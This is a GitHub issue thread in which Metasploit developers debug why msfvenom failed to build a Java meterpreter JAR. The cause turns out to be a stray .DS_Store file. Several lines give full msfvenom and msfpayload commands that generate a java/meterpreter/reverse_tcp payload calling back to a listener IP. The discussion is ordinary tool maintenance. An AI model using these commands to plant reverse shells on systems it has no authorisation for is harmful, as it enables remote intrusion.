### ISSUE TITLE
msfvenom fails to generate a JAR java payload

### ISSUE THREAD

**Issue by jvazquez-r7** [rapid7/metasploit-framework#5332]
With msfpayload I used to do:

```
./msfpayload java/meterpreter/reverse_tcp LHOST=172.16.158.1 LPORT=4444 R > /tmp/test.jar
```

To generate a ```jar``` with the java meterpreter. I cannot runt the command above anymore:

```
[!] ************************************************************************
[!] *               The utility msfpayload is deprecated!                  *
[!] *              It will be removed on or about 2015-06-08               *
[!] *                   Please use msfvenom instead                        *
[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *
[!] ************************************************************************
Error generating payload: No such file or directory @ rb_sysopen - 
/metasploit-framework/data/java/metasploit/Payload.class
```

I tried with msfvenom but I'm getting (I guess) the same error:

```
$ ./msfvenom -f raw -p java/meterpreter/reverse_tcp lhost=172.16.158.1 lport=4444 -o /tmp/test.jar
No such file or directory @ rb_sysopen - /metasploit-framework/data/java/metasploit/Payload.class
```

I guess it's related to the movement of the java meterpreter to the metasploit-payloads gem

**Comment by wchen-r7** [comment]
ah man

**Comment by wchen-r7** [comment]
Lost in here: https://github.com/rapid7/metasploit-framework/pull/5303

**Comment by wchen-r7** [comment]
@jvazquez-r7 I'm not reproducing the issue, can you please double check:

```
$ ./msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.123 -f raw -o /tmp/java.jar
Saved as: /tmp/java.jar
```

**Comment by bcook-r7** [comment]
Do you have local files under metasploit-framework/data/java ? The way the gem works, if you have data/java, it tries to use that as the source for java meterpreter files. Otherwise it uses the bundled class files. Normally, there should be nothing under data/java, but you might have some dev files left - it sounds like maybe there are some old files there, but not all of them.

If I'm right in guessing the situation here, the workaround for now is either rm -fr data/java, or to fully install development java meterpreter with 'mvn -P deploy package'. I guess we could modify the gem to pick .class files either from the local directory or the gem file on a file-by-file basis.

**Comment by jvazquez-r7** [comment]
@bcook-r7 

```
$ ls data/java
$
```

I've the dir but it's empty, should I delete the data/java folder :?

**Comment by jvazquez-r7** [comment]
oooo yes I see ```rm -fr data/java```, coolio, let me try

**Comment by bcook-r7** [comment]
yes - I'm surprised git didn't delete it for you. maybe there were some hidden files in there.

**Comment by jvazquez-r7** [comment]
```
$ ./msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.123 -f raw -o /tmp/java.jar
Saved as: /tmp/java.jar
``` :)

@bcook-r7  yup there was a ```.DS_Store``` file :(

**Comment by jvazquez-r7** [comment]
^^^ In case can be useful for others, I guess I'm not the only dev environment with .DS_Store files :P

**Comment by jvazquez-r7** [comment]
I'm gonna close it! thanks @bcook-r7 and @wchen-r7

**Comment by bcook-r7** [comment]
I'll probably need to make the check more robust then, perhaps also check if there are any files under  data/java as well. Funny that git chose to leave the deleted directory. Thanks for checking.

**Comment by kernelsmith** [comment]
DS_store is probably in his gitignore so maybe Git doesn't delete it cuz it's not tracked and is therefore leftover and so the dir isn't empty?  Just spitballing

**Comment by arduinka55055** [comment]
so how to make .class with my payload?
I need CLASS, not JAR! 

help please

**Comment by timwr** [comment]
@arduinka55055 , just unzip it then?
A jar file just contains zipped up class files. I think Payload.class is designed to be standalone

**Comment by arduinka55055** [comment]
> @arduinka55055 , just unzip it then? A jar file just contains zipped up class files. I think Payload.class is designed to be standalone

nope, jar has many .class files and other important stuff. Tried tho, doesnt work

**Comment by bcoles** [comment]
> > @arduinka55055 , just unzip it then? A jar file just contains zipped up class files. I think Payload.class is designed to be standalone
> 
> nope, jar has many .class files and other important stuff. Tried tho, doesnt work

This thread is about a 6 year old issue in `msfvenom`.

Perhaps someone on Slack can help you out with your questions:

* https://www.metasploit.com/help
